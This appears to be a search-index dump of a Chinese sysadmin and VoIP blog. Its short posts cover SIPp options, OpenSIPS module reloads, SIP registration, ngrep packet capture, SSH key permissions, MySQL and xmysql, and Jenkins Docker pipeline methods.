TCP with one socket, - tn: TCP with one socket per call, - l1: TLS with one socket, - ln: TLS with one socket per call, - s1: SCTP with one socket (default), - sn: SCTP with one socket per call, - c1: u1 + compression (only if compression plugin loaded), - cn: un + compression (only if compression plugin loaded). This plugin is not provided with sipp. -timeout : Global timeout. Default unit is seconds. If this option is set, SIPp quits after nb units (-timeout 20s quits after 20 seconds). 
-timeout_error : SIPp fails if the global timeout is reached is set (-timeout option required). -timer_resol : Set the timer resolution. Default unit is milliseconds. This option has an impact on timers precision.Small values allow more precise scheduling but impacts CPU usage.If the compression is on, the value is set to 50ms. The default value is 10ms. -T2 : Global T2-timer in milli seconds -sendbuffer_warn : Produce warnings instead of errors on SendBuffer failures. -trace_msg : Displays sent and received SIP messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_messages.log -trace_shortmsg : Displays sent and received SIP messages as CSV in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_shortmessages.log -trace_screen : Dump statistic screens in the \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file when quitting SIPp. Useful to get a final status report in background mode (-bg option). -trace_err : Trace all unexpected messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_errors.log. -trace_calldebug : Dumps debugging information about aborted calls to \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_calldebug.log file. -trace_stat : Dumps all statistics in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;.csv file. Use the \u0026#39;-h stat\u0026#39; option for a detailed description of the statistics file content. -trace_counts : Dumps individual message counts in a CSV file. -trace_rtt : Allow tracing of all response times in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_rtt.csv. -trace_logs : Allow tracing of \u0026lt;log\u0026gt; actions in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_logs.log. -users : Instead of starting calls at a fixed rate, begin \u0026#39;users\u0026#39; calls at startup, and keep the number of calls constant. -watchdog_interval: Set gap between watchdog timer firings. Default is 400. 
-watchdog_reset : If the watchdog timer has not fired in more than this time period, then reset the max triggers counters. Default is 10 minutes. -watchdog_minor_threshold: If it has been longer than this period between watchdog executions count a minor trip. Default is 500. -watchdog_major_threshold: If it has been longer than this period between watchdog executions count a major trip. Default is 3000. -watchdog_major_maxtriggers: How many times the major watchdog timer can be tripped before the test is terminated. Default is 10. -watchdog_minor_maxtriggers: How many times the minor watchdog timer can be tripped before the test is terminated. Default is 120. -tls_cert : Set the name for TLS Certificate file. Default is \u0026#39;cacert.pem -tls_key : Set the name for TLS Private Key file. Default is \u0026#39;cakey.pem\u0026#39; -tls_crl : Set the name for Certificate Revocation List file. If not specified, X509 CRL is not activated. -3pcc : Launch the tool in 3pcc mode (\u0026#34;Third Party call control\u0026#34;). The passed ip address is depending on the 3PCC role. - When the first twin command is \u0026#39;sendCmd\u0026#39; then this is the address of the remote twin socket. SIPp will try to connect to this address:port to send the twin command (This instance must be started after all other 3PCC scenarii). Example: 3PCC-C-A scenario. - When the first twin command is \u0026#39;recvCmd\u0026#39; then this is the address of the local twin socket. SIPp will open this address:port to listen for twin command. Example: 3PCC-C-B scenario. -tdmmap : Generate and handle a table of TDM circuits. A circuit must be available for the call to be placed. Format: -tdmmap {0-3}{99}{5-8}{1-31} -key : keyword value Set the generic parameter named \u0026#34;keyword\u0026#34; to \u0026#34;value\u0026#34;. -set : variable value Set the global variable parameter named \u0026#34;variable\u0026#34; to \u0026#34;value\u0026#34;. 
-multihome : Set multihome address for SCTP -heartbeat : Set heartbeat interval in ms for SCTP -assocmaxret : Set association max retransmit counter for SCTP -pathmaxret : Set path max retransmit counter for SCTP -pmtu : Set path MTU for SCTP -gracefulclose : If true, SCTP association will be closed with SHUTDOWN (default). If false, SCTP association will be closed by ABORT. -dynamicStart : variable value Set the start offset of dynamic_id varaiable -dynamicMax : variable value Set the maximum of dynamic_id variable -dynamicStep : variable value Set the increment of dynamic_id variable Signal handling: SIPp can be controlled using posix signals. The following signals are handled: USR1: Similar to press \u0026#39;q\u0026#39; keyboard key. It triggers a soft exit of SIPp. No more new calls are placed and all ongoing calls are finished before SIPp exits. Example: kill -SIGUSR1 732 USR2: Triggers a dump of all statistics screens in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file. Especially useful in background mode to know what the current status is. Example: kill -SIGUSR2 732 Exit code: Upon exit (on fatal error or when the number of asked calls (-m option) is reached, sipp exits with one of the following exit code: 0: All calls were successful 1: At least one call failed 97: exit on internal command. 
Calls may have been processed 99: Normal exit without calls processed -1: Fatal error -2: Fatal error binding a socket Example: Run sipp with embedded server (uas) scenario: ./sipp -sn uas On the same host, run sipp with embedded client (uac) scenario ./sipp -sn uac 127.0.0.1 参考 http://sipp.sourceforge.net/doc/reference.html http://sipp.sourceforge.net/doc3.3/reference.html 实战脚本学习 下面的两个链接里面有很多的真实场景测试的xml文件,可以用来深入学习\nhttps://github.com/pbertera/SIPp-by-example https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=pl 中文教程 sippZhong Wen Jiao Cheng - Knight.pdf 黄龙舟翻译 ","permalink":"https://wdd.js.org/opensips/tools/sipp/","summary":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装依赖 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. 
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.","title":"SIPp:sip压测模拟ua工具"},{"content":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在xxx.cfg的第189行哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。\n","permalink":"https://wdd.js.org/posts/2019/09/myy94p/","summary":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在xxx.cfg的第189行哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。","title":"编译器和女朋友有什么相同之处"},{"content":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","permalink":"https://wdd.js.org/opensips/ch5/homer6/","summary":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","title":"opensips 集成 homer6"},{"content":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到内存,状态变化时,再回写到数据库。有以下模块列表:\ndispatcher load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处是不用每次都查数据库,运行速度会大大提升。\n以dispatcher为例子,opensips在启动时会从数据库中加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. 
The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes链接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下会返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","permalink":"https://wdd.js.org/opensips/ch3/cache-reload/","summary":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到内存,状态变化时,再回写到数据库。有以下模块列表:\ndispatcher load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处是不用每次都查数据库,运行速度会大大提升。\n以dispatcher为例子,opensips在启动时会从数据库中加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. 
The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes链接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下会返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","title":"模块缓存策略与reload方法"},{"content":" sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, 
callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了,如果服务端的记录还没有失效,新的注册就会失败。\n有的客户会经常反馈,他们的分机总是无故掉线。经过抓包分析,发现分机每隔1.5分钟注册一次,使用tcp注册的,每次的端口号都会变成不同的值。\n然后尝试让分机用udp注册,分机就不再异常掉线了。\n一个tcp socket一旦关闭,新的tcp socket必然会被分配不同的端口。但是udp不一样,udp是无连接的。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-register/","summary":"sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, 
callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了,如果服务端的记录还没有失效,新的注册就会失败。","title":"SIP注册调研"},{"content":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","permalink":"https://wdd.js.org/posts/2019/08/vhovcg/","summary":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 
解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","title":"ssh 私钥使用失败"},{"content":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via头的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","permalink":"https://wdd.js.org/opensips/ch5/via-route/","summary":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via头的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","title":"SIP路由头"},{"content":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux抓包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily. Server: Apache-Coyote/1.1. Set-Cookie: JSESSIONID=211CA612EC681B9FDCE7726B03F42088; Path=/; HttpOnly. Location: http://192.168.60.200:7775/homepage.action. Content-Type: text/html. Content-Length: 0. Date: Fri, 16 Aug 2019 02:16:51 GMT. 
过滤规则 按IP地址过滤 ngrep -W byline host 192.168.60.200 # 源地址或者目的地址是 192.168.60.200 按端口过滤 ngrep -W byline port 80 # 源端口或者目的端口是 80 按照正则匹配 ngrep -W byline -q HTTP # 匹配所有包中含有HTTP的 指定网卡 默认情况下,ngrep使用网卡列表中的一个网卡,当然你也可以使用-d选项来指定抓包某个网卡。\nngrep -W byline -d eth0 host 192.168.60.200 参考 https://www.tecmint.com/ngrep-network-packet-analyzer-for-linux/ https://github.com/jpr5/ngrep ","permalink":"https://wdd.js.org/network/pxn896/","summary":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux抓包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . 
# T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily.","title":"ngrep明文http抓包教程"},{"content":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","permalink":"https://wdd.js.org/posts/2019/08/iyotwd/","summary":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","title":"在不打开文件,将全文复制到剪贴板"},{"content":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","permalink":"https://wdd.js.org/posts/2019/08/gw9eka/","summary":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","title":"macbook pro 开机后wifi无响应问题调研"},{"content":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql\n","permalink":"https://wdd.js.org/posts/2019/08/kieuga/","summary":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql","title":"mysql远程连接速度太慢"},{"content":"github向我推荐这个xmysql的时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天才能给我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 
安装与使用\nnpm install -g xmysql\nxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName\n浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?_ids=1,2,3 DELETE :fire: /api/tableName/bulk Deletes multiple rows - /api/tableName/bulk?_ids=1,2,3 GET /api/tableName/:id Retrieves a row by primary key PATCH /api/tableName/:id Updates row element by primary key DELETE /api/tableName/:id Delete a row by primary key GET /api/tableName/findOne Works as list but gets single record matching criteria GET /api/tableName/count Count number of rows in a table GET /api/tableName/distinct Distinct row(s) in table - /api/tableName/distinct?_fields=col1 GET /api/tableName/:id/exists True or false whether a row exists or not GET /api/parentTable/:id/childTable Get list of child table rows with parent table foreign key GET :fire: /api/tableName/aggregate Aggregate results of numeric column(s) GET :fire: /api/tableName/groupby Group by results of column(s) GET :fire: /api/tableName/ugroupby Multiple group by results using one call GET :fire: /api/tableName/chart Numeric 
column distribution based on (min,max,step) or(step array) or (automagic) GET :fire: /api/tableName/autochart Same as Chart but identifies which are numeric column automatically - gift for lazy while prototyping GET :fire: /api/xjoin handles join GET :fire: /dynamic execute dynamic mysql statements with params GET :fire: /upload upload single file GET :fire: /uploads upload multiple files GET :fire: /download download a file GET /api/tableName/describe describe each table for its columns GET /api/tables get all tables in database 3 更多资料 项目地址:https://github.com/o1lab/xmysql ","permalink":"https://wdd.js.org/posts/2019/08/vv5oro/","summary":"github向我推荐这个xmysql的时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天才能给我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysql\nxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName\n浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - 
/api/tableName/bulk?","title":"xmysql 一行命令从任何mysql数据库生成REST API"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)Some methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). 
Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. 
